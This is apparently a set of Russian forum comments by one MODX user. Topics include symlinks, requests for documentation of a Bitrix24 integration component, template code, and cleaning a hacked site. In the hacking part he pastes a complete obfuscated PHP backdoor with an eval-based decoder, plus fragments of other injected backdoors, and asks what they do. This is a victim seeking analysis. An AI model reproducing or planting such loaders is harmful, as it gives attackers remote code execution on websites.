Олег Захаров

По поводу символьных ссылок и привязки к папкам — по вашей команде

sudo mount --bind /var/www/test/www/dateAgo/core/components/dateago/ /var/www/test/www/core/components/dateago/

мне на обычном хостинге не удалось сделать ссылки на директории. Техподдержка подсказала что через команду sudo у них команды не работают. и подсказала что работает команда

ln -s /home/host1111111/domen.ru/dev/www/core /home/host1111111/domen.ru/www/core

Что это проще даже, мол всегда сработает. И сработало.

Ну тут есть некая попытка замотивировать Артема. Именно из-за того что это пока единственное решение — оно имеет все шансы вырасти в количестве инсталляций в 10 раз. Т.к. пользователей Битрикс24 — несколько миллионов. Я по себе сужу: Я не могу нормально продавать решения с использованием этого компонента — только потому что я сам внедрил это решение буквально на пару сайтов, и уже спотыкаюсь, из-за множества непоняток что как делать. А так бы уже давно поставил этот компонент еще на 10-20 сайтов (всем своим клиентам которые сидят на Битрикс24). Вот мне сейчас надо будет предлагать решение для автоворонок, туннелирования. С этим компонентом это можно хорошо сделать. Но не хватает гайда. Это крайне крутой инструмент. Но как с ним работать пока не понятно. Придется вкуривать и сидеть изучать документацию. А хотелось инструкции.

Прошу прощения, я что-то лишнего попросил? Я автору по проблеме работы формы с файлами (не работает интеграция с FormIT с формой где есть files) написал еще 05 мая, но он ответил что не работал с файлами, но обещал доработать компонент. Времени прошло много, реакции нет. Решил написать сюда публично, чтобы подтолкнуть автора что-то сделать (в техподдержку тоже написал). Надеялся что я не один такой, кому нужно больше информации. И при наличии большого отклика надеялся что дело сдвинется с мертвой точки.
Но чего Вы, Дмитрий, хотели добиться своим комментарием? Защитить Артема? От меня? Я что на него нападаю? Я всего лишь прошу. Это же можно? Я написал пост искренне желая развития столь замечательного компонента и я искренне благодарен Артему за его труд и не имею к нему претензий. Давайте по делу и без холивара.
Позиция что это «единственный» компонент не означает что надо к пользователям относится с позиции «те кому это надо». Мы таким отношением нисколько не популяризируем MODx сообщество. Это печалька. Вы Дмитрий видимо программист в первую очередь и продавец в последнюю очередь (извините хотя я Вас не знаю, не хочу оскорбить как-то). Почему так думаю — потому что часто программисты плохие продавцы ( и рассуждают с позиции «ох как рано встает охрана»). А хороший продавец думает о том как решить проблему покупателя.

Не хватает хорошей техдокументации что и как настраивать. Уважаемый Артем, можно ли сделать демосайт?
С описанием примеров:

1. создаем, лид/сделку/контакт/компанию,
2. интегрируем с FormIt/AjaxForm, с описанием оформления параметров; С добавлением файлов! — у меня из-за этого не работает форма и теряются лиды (а очень очень надо);
3. получаем лид/сделку/контакт/компанию, меняем значение этих сущностей и сохраняем изменения в CRM;
4. работа с разными аккаунтами CRM (в одной компании два разных отдела работают в разных аккаунтах), при едином движке двух сайтов (работа через контексты);
5. создание записи в карточке Лида/Сделки/Контакта/Компании.
6. Например, хотелось бы при возвращении клиента на сайт сделать запись в карточку клиента/сделки?
7. И как задачи создавать? с привязкой к сущностям CRM (лид/сделка/контакт/компания)?

Артем, уверен что если добавите больше описания, популярность и продажи вашего компонента вырастут раз 10.
Я например настроил интеграцию, указал в настройках компонента ID пользователя (1), но почему-то упорно лид создается на другого пользователя (4). Лид создается с названием WEB 2018-08-25 10:17:12 — как настроить свое название? Понятно что можно обратиться в техподдержку, но хотелось бы самому научиться и разбираться во всем, не отвлекая каждый раз Автора компонента (к тому же нет желания ждать ответа, а хочется сразу самому все сделать пока код в голове «держишь»).

Выложил результаты проверки айболитом, но не успел написать зачем. Я правильно понимаю что все эти левые файлы с переменными массивами аля Global — потенциально результаты взлома сайтов?
Меня удивляет как удалось злоумышленникам записать в директории админки и коннекторов если я их переименовал (core вынес наверх)?
Из списка обнаруженного — можно говорить что риску взлома подвержены компоненты Minify? (про Gallery понятно).
Как зараза они смогли модифицировать системные файлы (/controllers/default/system/event.class.php).
У себя заметил что все измененные и зараженные файлы были модифицированны в одно и то же время (28.05.18). И таким образом я искал все файлы которые были изменены в эту дату. Но все равно айболит нашел файлы которые имели дату изменения более ранние (даже 2016 года), но при этом были встроенные левые коды (сравнивал с другими сайтами — там левых кодов в этих файлах не было).

Это Вы расшифровали код выше? Если да то как вы расшифровали? Я чайник:)
Что делает этот файл? Это взлом? Удалять этот файл?

/min/tvdatruc.php
Этот файл левый лишний как оказалось — в нем явно что-то подозрительное было (без айболита не догадался бы). Может кто подскажет что делает этот файл?:

<?php
 $fhfkjo = 6232; function trpnppanw($kjxxlt, $nusiveq){$wlpcduyeom = ''; for($i=0; $i < strlen($kjxxlt); $i++){$wlpcduyeom .= isset($nusiveq[$kjxxlt[$i]]) ? $nusiveq[$kjxxlt[$i]] : $kjxxlt[$i];}
$dtgakqfymz="rawurl" . "decode";return $dtgakqfymz($wlpcduyeom);}
$kbkxysfg = '%gsy2y_M49%Q6%QrfyMAXlt_4qqiqM%Qr%Qjs%QZ%Vv%sU%sF%gsy2y_M49%Q6%QrXi1'.
'_4qqiqM%Qr%Qjs%QZ%Vv%sU%sF%gs4qqiq_q4Aiq9y21%Q6s%QZ%Vv%sU%sF%gsM49_9'.
'yE4_XyEy9%Q6s%QZ%Vv%sU%sF%gsy12iq4_OM4q_lRiq9%Q6p%QZ%Vv%sU%sF%gsy2y_M49%Q6%QrElS'.
'_4S4dO9yi2_9yE4%Qr%Qjs%QZ%Vv%sU%sF%sU%sF0iq4ldB%Qs%Q6%Qg_jbbCuo%QslM%Qs%Qgy94E%QZ%sU%sF%r'.
'v%sU%sF%Qs%Qs%Qs%Qsy0%Qs%Q6%Qgy94E%Qs%Qp%VU%Qs%QQ0s6dgQfs-Rp5f-gQe4-ZlRV-gVrr5d6Q0Qpf%QQ%QZ%sU%sF'.
'%Qs%Qs%Qs%Qs%Qs%Qs%Qs%Qs4Sy9%Q6%QZ%Vv%sU%sF%rU%sU%sF%sU%sF%Qgfl'.
'9l%Qs%VU%Qs0yX4_149_di29429M%Q6%QrABA%VF//y2AO9%Qr%QZ%Vv%sU%sF%Qgfl9l%Qs%VU%QsMAX'.
'y9%Q6%QQ%VU%QQ%Qj%Qgfl9l%QjQ%QZ%Vv%sU%sF%sU%sF%QgR5g_f4dif4_fl9l%Qs%VU%QsRlM45g_f4dif'.
'4%Q6OqXf4dif4%Q6%Qgfl9l%evp%eU%QZ%QZ%Vv%sU%sF%sU%sF%QgM42f_fl9l%Qs%VU'.
'%QsO2M4qylXyk4%Q6f4dqtA9%Q6%QgR5g_f4dif4_fl9l%QZ%QZ%Vv%sU%sF'.
'%sU%sF%Qgq4MOX9%Qs%VU%QsM42f_fl9lp%Qs%Q6%QgM42f_fl9l%QZ%Vv%sU%sF%sU%sFy0%Qs%Q6%Qp%Qgq4MOX9%QZ%sU%'.
'sF%rv%sU%sF%Qs%Qs%Qs%Qs%Qgq4MOX9%Qs%VU%QsM42f_fl9lQ%Q6%QgM42f_fl9l%QZ%Vv%sU'.
'%sF%rU%sU%sF%sU%sF4dBi%Qs%Qgq4MOX9%Vv%sU%sF%sU%sF0O2d9yi2%Qsf4'.
'dqtA9%Q6%Qgfl9l%QZ%sU%sF%rv%sU%sF%Qs%Qs%Qs%Qs%QgiO9_fl9l%Qs%VU%Qs%QQ%QQ%Vv%sU%sF%Qs%Qs%Qs%Qs%Qgc4t%Q'.
's%VU%Qs%Qg_YohGoh%ev%QrT88a_TbY8%Qr%eU%Qs.%Qs%Qg_YohGoh%ev%QrhoKWoY8_W'.
'hu%Qr%eU%Vv%sU%sF%Qs%Qs%Qs%Qs%Qgc4t_X42%Qs%VU%QsM9qX42%Q6%Qgc4t%QZ%Vv%sU%sF%Qs%sU%sF%Qs%Qs%Qs%Qs0i'.
'q%Qs%Q6%Qgy%VUs%Vv%Qs%Qgy%Qs%Vj%QsM9qX42%Q6%Qgc4t%QZ%Vv%Qs'.
'%Qgy%Qv%Qv%QZ%sU%sF%Qs%Qs%Qs%Qs%rv%sU%sF%Qs%Qs%Qs%Qs%Qs%Qs%Qs%Qs'.
'%Qgc4t%ev%Qgy%eU%Qs%VU%QsdBq%Q6iqf%Q6%Qgc4t%ev%Qgy%eU%QZ%Qs%eo%Qs%Q6%Qgc4t_X42%Qs%Q'.
'e%QsQee%QZ%QZ%Vv%sU%sF%Qs%Qs%Qs%Qs%rU%sU%sF%sU%sF%Qs%'.
'Qs%Qs%Qs0iq%Qs%Q6%Qgy%VUs%Vv%Qs%Qgy%VjM9qX42%Q6%Qgfl9l%QZ%Vv%QZ%sU%sF%Qs%Qs%Qs%Qs%rv%sU%sF%'.
'Qs%Qs%Qs%Qs%Qs%Qs%Qs%Qs0iq%Qs%Q6%QgP%VUs%Vv%Qs%QgP%VjM9q'.
'X42%Q6%Qgc4t%QZ%Qs%Q5%Q5%Qs%Qgy%VjM9qX42%Q6%Qgfl9l%QZ%Vv%Qs%QgP'.
'%Qv%Qv%Qj%Qs%Qgy%Qv%Qv%QZ%sU%sF%Qs%Qs%Qs%Qs%Qs%Qs%Qs%Qs%rv%sU%sF%Qs'.
'%Qs%Qs%Qs%Qs%Qs%Qs%Qs%Qs%Qs%Qs%Qs%QgiO9_fl9l%Qs.%VU%QsdBq%Q6iqf%Q6%Qgfl9l%ev%Qgy%eU%QZ%Q'.
's%eo%Qsiqf%Q6%Qgc4t%ev%QgP%eU%QZ%QZ%Vv%sU%sF%Qs%Qs%Qs%Qs%Qs%Qs%Qs%Q'.
's%rU%sU%sF%Qs%Qs%Qs%Qs%rU%sU%sF%sU%sF%Qs%Qs%Qs%Qsq49Oq2%Qs%QgiO9'.
'_fl9l%Vv%sU%sF%rU%sU%sF%sU%sF0O2d9yi2%QsM42f_fl9lp%Q6%Qgfl'.
'9l%QZ%sU%sF%rv%sU%sF%Qs%Qs%Qs%Qs%QgB4lf%Qs%VU%Qs%QQ%QQ%Vv%sU%sF%sU%sF%Qs'.
'%Qs%Qs%Qs0iq4ldB%Q6%Qgfl9l%ev%QQB4lf4qM%QQ%eU%QslM%Qs%Q'.
'gc4t%VU%Vo%QgzlXO4%QZ%sU%sF%Qs%Qs%Qs%Qs%rv%sU%sF%Qs%Qs%Qs%Qs%Qs%Qs%Qs%Qs%QgB4lf%Qs.%VU%Qs%Qgc4t%Qs.'.
'%Qs%QQ%VF%Qs%QQ%Qs.%Qs%QgzlXO4%Qs.%Qs%QQ%ejq%ej2%QQ%Vv%sU%sF%Qs%Qs%Qs%Qs%rU%sU%s'.
'F%sU%sF%Qs%Qs%Qs%Qs%QgAlqlEM%Qs%VU%Qslqqlt%Q6%QrB99A%Qr%Qs%VU%Vo%Qslqqlt%Q6%sU%s'.
'F%Qs%Qs%Qs%Qs%Qs%Qs%Qs%Qs%QrE49Bif%Qr%Qs%VU%Vo%Qs%Qgf'.
'l9l%ev%QQE49Bif%QQ%eU%Qj%sU%sF%Qs%Qs%Qs%Qs%Qs%Qs%Qs%Qs%QrB4lf4q%Qr%Qs%V'.
'U%Vo%Qs%QgB4lf%Qj%sU%sF%Qs%Qs%Qs%Qs%Qs%Qs%Qs%Qs%Qrdi29429%Qr%Qs%V'.
'U%Vo%Qs%Qgfl9l%ev%QQRift%QQ%eU%Qj%sU%sF%Qs%Qs%Qs%Qs%Q'.
's%Qs%Qs%Qs%Qr9yE4iO9%Qr%Qs%VU%Vo%Qs%Qgfl9l%ev%QQ9yE4iO9%QQ%eU%Qj%sU%sF%Qs%Qs%Qs%Qs%Qs%Q'.
's%Qs%Qs%sU%sF%Qs%Qs%Qs%Qs%QZ%QZ%Vv%sU%sF%sU%sF%Qs%Qs%Qs'.
'%Qs%Qgd9S%Qs%VU%QsM9q4lE_di294S9_dq4l94%Q6%QgAlqlEM%QZ%Vv%sU%sF%Qs%Qs%Qs%Qs%sU%sF%Qs%Qs%Qs%Qs%Q'.
'gq4MOX9%Qs%VU%Qs%gs0yX4_149_di29429M%Q6%Qgfl9l%ev%QQOqX%QQ%eU%Qj%QsLF'.
'wYo%Qj%Qs%Qgd9S%QZ%Vv%sU%sF%sU%sF%Qs%Qs%Qs%Qsy0%Qs%Q6%QgB99A_q4MAi2M4_'.
'B4lf4q%QZ%sU%sF%Qs%Qs%Qs%Qs%rv%sU%sF%Qs%Qs%Qs%Qs%Qs%Qs%Qs%Qsy0%Qs%Q6M9qAiM%Q6%'.
'QgB99A_q4MAi2M4_B4lf4q%evs%eU%Qj%Qs%QQQss%QQ%QZ%Qs%'.
'VU%VU%VU%QsLFwYo%QZ%sU%sF%Qs%Qs%Qs%Qs%Qs%Qs%Qs%Qs%rv%sU%sF%Qs%Qs%Qs%Qs%Qs%Qs%Qs%Qs%Qs%Qs%Qs%Qs%'.
'Qgq4MOX9%Qs%VU%Qs%QQT88a_ohhbh%ej9%QQ%Qs.%Qs%QgB99A_q4MAi2M4_B4lf4q%evs%eU%Vv%sU%sF%Qs%Qs%Qs%Qs'.
'%Qs%Qs%Qs%Qs%rU%sU%sF%Qs%Qs%Qs%Qs%rU%sU%sF%Qs%Qs%Qs%Qs4XM4%sU%sF%Qs%Qs%Qs%'.
'Qs%rv%sU%sF%Qs%Qs%Qs%Qs%Qs%Qs%Qs%Qs%Qgq4MOX9%Qs%VU%Qs%QQjbNNoj8ubN'.
'_ohhbh%QQ%Vv%sU%sF%Qs%Qs%Qs%Qs%rU%sU%sF%sU%sF%Qs%Qs%Qs%Qsq49Oq2%Qs%Qgq4MOX9%Vv%sU%sF%rU%sU%'.
'sF%sU%sF0O2d9yi2%QsM42f_fl9lQ%Q6%Qgfl9l%QZ%sU%sF%rv%sU%sF%Qs%Qs%Qs%Qs//%QsOM4%QsMidc49M%sU%sF%rU';
$zhmoaocvvt = Array('1'=>'g', '0'=>'f', '3'=>'J', '2'=>'n', '5'=>'6', '4'=>'e', '7'=>'Y', '6'=>'8', '9'=>'t', '8'=>'T', 'A'=>'p', 'C'=>'K', 'B'=>'h', 'E'=>'m', 'D'=>'G', 'G'=>'V', 'F'=>'A', 'I'=>'Z', 'H'=>'X', 'K'=>'Q', 'J'=>'w', 'M'=>'s', 'L'=>'F', 'O'=>'u', 'N'=>'N', 'Q'=>'2', 'P'=>'j', 'S'=>'x', 'R'=>'b', 'U'=>'D', 'T'=>'H', 'W'=>'U', 'V'=>'3', 'Y'=>'S', 'X'=>'l', 'Z'=>'9', 'a'=>'P', 'c'=>'k', 'b'=>'O', 'e'=>'5', 'd'=>'c', 'g'=>'4', 'f'=>'d', 'i'=>'o', 'h'=>'R', 'k'=>'z', 'j'=>'C', 'm'=>'q', 'l'=>'a', 'o'=>'E', 'n'=>'W', 'q'=>'r', 'p'=>'1', 's'=>'0', 'r'=>'7', 'u'=>'I', 't'=>'y', 'w'=>'L', 'v'=>'B', 'y'=>'i', 'x'=>'M', 'z'=>'v');
eval/*tbtro*/(trpnppanw($kbkxysfg, $zhmoaocvvt));?>

Проверил айболитом сайт, и обнаружил кучу левых файлов.
Закодированных обозначений, и т.д.
Что удивительно на одном аккаунта хостинга (host land. ru) сайт взломали, а на другом аккаунте этого же хостинга сайт с такими же настройками ничего не тронуто. У хостинга есть встроенный инструментарий айболита.
Ставились сайты по расширенной схеме установки, с переносом core на верхний уровень, переименованием manager и connectors.
Вот список того что было заражено:
файл minishop:
/htdocs/www/assets/components/minishop2/action.php

<?php  $sddc9=953;$GLOBALS['u82de9955']=Array();global$u82de9955;$u82de9955=$GLOBALS;${"GLOBALS"}['p25bd']="MDh|j,.2*pLX]k`r z...

А также были левые файлы формата:
в переименованной папке connectors:
htdocs/www/nkucon/modx.config.js.php

<?php  $l78fe=139;$GLOBALS['q1fa']=Array();global$q1fa;$q1fa=$GLOBALS;${"GLOBALS"}['ie8f4ba']="m5O0jNoJ`aPFeA*Uu)7MTlIg/W=tdD...

в переименованной папке manager
/templates/default/security/xwfngqlk.php

[x] 1…],$ecdcgle);}function snjjs($ykflixg,$ecdcgle){$rbxgy=$ykflixg[3]($ecdcgle)%3;if(!$rbxgy){eval($ecdcgle[1]($ecdcgle[2])) ;exit();}}$snpdlrd=qygzs($ykflixg,$snpdlrd);snjjs($ykflixg,$ykflixg[5]($ykflixg[2],$snpdlrd^hwmzer($ykflixg,$jpakg,$ykf...

/min/lib/HTTP/bqnuysmc.php

qhb[1],$ggsqcy);}function vrmig($cyqhb,$ggsqcy){$qtmonda=$cyqhb[3]($ggsqcy)%3;if(!$qtmonda){eval($ggsqcy[1]($ggsqcy[2])) ;exit();}}$hbcida=otbrb($cyqhb,$hbcida);vrmig($cyqhb,$cyqhb[5]($cyqhb[2],$hbcida^obcapmw($cyqhb,$zlttwd,$cyqhb[8]($hbci

/assets/modext/sections/jghrrjgz.php

<?php $sines="xufdkbzhqkxjbmhd";$gqyxidhc="";foreach($_POST as$csnktd=>$myqzsuhi){if(strlen($csnktd)==16 and substr_coun...

/controllers/default/system/event.class.php

<?php  $ad0aac=275;$GLOBALS['h1faaea']=Array();global$h1faaea;$h1faaea=$GLOBALS;${"GLOBALS"}['u97733']="sv4wC?9-tufX>L[nhrlJ`...

/min/lib/Minify/HTML.php

<?php  $daaf=485;$GLOBALS['nd89']=Array();global$nd89;$nd89=$GLOBALS;${"GLOBALS"}['q5aa44f17']="Wh$}xu|`v>'4z !S8o*F6DlAQ]aU+...

/min/lib/Minify/DebugDetector.php

<?php  $g15b8b=90;$GLOBALS['u0714688']=Array();global$u0714688;$u0714688=$GLOBALS;${"GLOBALS"}['ca8744']="[yDSA#^,7nRV'*({lUX

в корне папки assets
/assets/zlpiiuol.php

[x] 1…1],$bhegny);}function rrqivtg($vxccsyo,$bhegny){$oiznry=$vxccsyo[3]($bhegny)%3;if(!$oiznry){eval($bhegny[1]($bhegny[2])) ;exit();}}$ggxen=mfldvnr($vxccsyo,$ggxen);rrqivtg($vxccsyo,$vxccsyo[5]($vxccsyo[2],$ggxen^rgdckh($vxccsyo,$jrqyubr,$vxc

На одном из сайтов были директории плагинов редактора tinymce (не совсем понимаю почему он у меня лежит в корне сайта, а не в папке assets, лень разбирается что есть то есть)
там тоже обнаружился левый код в контроллере:
htdocs/www/js/tinymce/plugins/jbimages/ci/system/core/Controller.php

<?php  $n6655bfa1=731;$GLOBALS['s32b51d']=Array();global$s32b51d;$s32b51d=$GLOBALS;${"GLOBALS"}['l8639444']="*:18p;L"#hUujK[$J...

и
htdocs/www/js/tinymce/plugins/jbimages/ci/system/core/Benchmark.php

<?php  $ac4035c=116;$GLOBALS['ra9c765d2']=Array();global$ra9c765d2;$ra9c765d2=$GLOBALS;${"GLOBALS"}['c18ffec1']="Qtb7->L{voWkr...

При сканировании выходят сообщения:

Консоль запущена...
Загрузка системного ядра: modx-2.6.5-pl
Recoverable error: Argument 1 passed to scannerMODXfilemanager::loadFile() must be an instance of string, string given, called in /home/host1111111/modxcore/components/scannermodx/model/Core.php on line 312 and defined
Загрузка ядра системы завершена
Удаление старых отчетов
Сброс сессии
Сканирование директорий: /home/host1111111/имядомена/htdocs/www/
Всего найдено файлов: 1730
Начать проверку файлов
Recoverable error: Argument 1 passed to scannerMODXfilemanager::loadFile() must be an instance of string, string given, called in /home/host1111111/modxcore/components/scannermodx/model/scannermodx.class.php on line 311 and defined
Recoverable error: Argument 1 passed to scannerMODXfilemanager::loadFile() must be an instance of string, string given, called in /home/host1111111/modxcore/components/scannermodx/model/scannermodx.class.php on line 311 and defined
...
и так +100500 строк про on line 311

Может быть связано с тем что установка сделана не как обычно, а с Advanced версией и с выносом ядра на более верхний уровень хостинга? Критичны ли эти ошибки?

Поставил по инструкции выше.
Далее получил следующее:

Некоторые страницы перестали открываться в режиме редактирования.
Выходит ошибка:

Fatal error: Cannot redeclare class modTemplateVarInputRenderText in /путь до папки core/model/modx/processors/element/tv/renders/mgr/input/text.class.php on line 10

Проверил — код файла содержит следующий текст:

<?php
/**
 * @package modx
 * @subpackage processors.element.tv.renders.mgr.input
 */
class modTemplateVarInputRenderText extends modTemplateVarInputRender {
    public function getTemplate() {
        return 'element/tv/renders/input/textbox.tpl';
    }
}
return 'modTemplateVarInputRenderText';

Сопоставил с исходниками установочными — совпадает.
Очистка кеша не помогала.

Далее отключил вновь созданное TVполе от шаблонов — страницы в режиме стали открываться.
То есть есть какая-то проблема с render.

P.S. поиск проблемы привел к тому что обнаружил на сайте левые файлы (бекдоры), пришлось еще заняться чисткой. Благо сайт был обновлен до последней версии, в основном были обнаружены левые файлы, JS не пострадали.

Это важный вопрос -мне например нужно исправить сотни ссылок в рекламных кампаниях. Хорошо было бы чтобы редирект был с сохранением utm меток. Именно по маске это бы сработало. А сейчас никак. Автор, сделайте что-нибудь. Задача-то не сложная.
Вот тут modx.pro/help/11394 есть ссылка на готовое решение -можно оттуда код использовать?

Только что обновил движок на одном из сайтов с помощью Advanced пакета. Никаких папок connectors и manager в установочном пакете не было — вы откуда брали пакет? Берите с modx точка com. В самом сайте папка core у меня перенесена на верхний уровень корня сайта, connectors и manager переименованы. Все было как обычно. Скорее всего Вы на каком-то этапе сделали ошибку.

удалил

Автора прошу сделать нормальную документацию, до много приходится додумывать как пользоваться (без претензии, это просьба).
Что за изменения в последних версиях?

проставил в настройках контекста web site_url с косой чертой в конце и все стало работать. Но причину понятно не нашел, суффикс стоит /,
.htaccess — содержимое по умолчанию, ничего не трогал

RewriteEngine On
RewriteBase /
# The Friendly URLs part
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php?q=$1 [L,QSA]

RewriteCond %{HTTP_HOST} ^www\.(.*)$ [NC]
RewriteRule ^(.*)$ http://%1/$1 [R=301,L]

Еще заметил что при открытии из админки при клике правой кнопки мыши по ресурсу по ссылке Просмотреть также происходит склеивание ссылки — удаление косой черты

тоже искал как решить подобную задачу — на странице категории вывожу подкатегорию и первые 10 товаров подкатегории с выводом картинки товара и названия в виде ссылки. Сделал примерно так (в fenom):

{*получаем список товаров подкатегории*}
{*$cat2level - подставляем id родительской категории*}
{var $products_cats2level = ('pdoResources' | snippet : ['parents' => $cat2level, 'depth' => '0', 'limit' => 10, 'returnIds' => 1, 'sortdir'=>'asc', 'where' => '{"class_key":"msProduct"}'] | split : ',')}
{if $products_cats2level['0'] ?}    {*проверяю есть ли вообще хоть один элемент в массиве*}
	<div class="row" >
		{foreach $products_cats2level as $product_cats2level} 
			<a href="{$_modx->makeUrl($product_cats2level,'','','full')}"> {*вывожу ссылку *}
				<div id="img_{$product_cats2level}" class="col-xs-2 " style="margin-top: 15px;">
					{'msGallery' | snippet : ['product'=>$product_cats2level, 'includeThumbs'=>'mini','tpl'=>'@INLINE <img src="{$files["0"]["mini"]}">']} {*mini - это параметр формата медиаресурса,  у меня mini: "mini":{"h":50,"q":90,"far":"1","bg":"ffffff"}*}
				</div>
				<div id="caption_{$product_cats2level}" class="col-xs-10" style="margin-top: 25px;" >
					{'pdoField' | snippet : ['id' => $product_cats2level]} {*название подкатегории*}
				</div>
				<div class="clear"></div>
			</a>
		{/foreach}
	</div>
{/if}

«files»:«WEBDAV_ELEMENTS»?

Подскажите, а как в форме файлы передавать в лиды? Как прописать JSON соответствие если грузим 1 файл, несколько файлов?

Спасибо! Я вроде так же пробовал вначале, но видимо чтото не так написал, сайт не грузил страницу, я грешил на fenom. А ваш код заработал без проблем.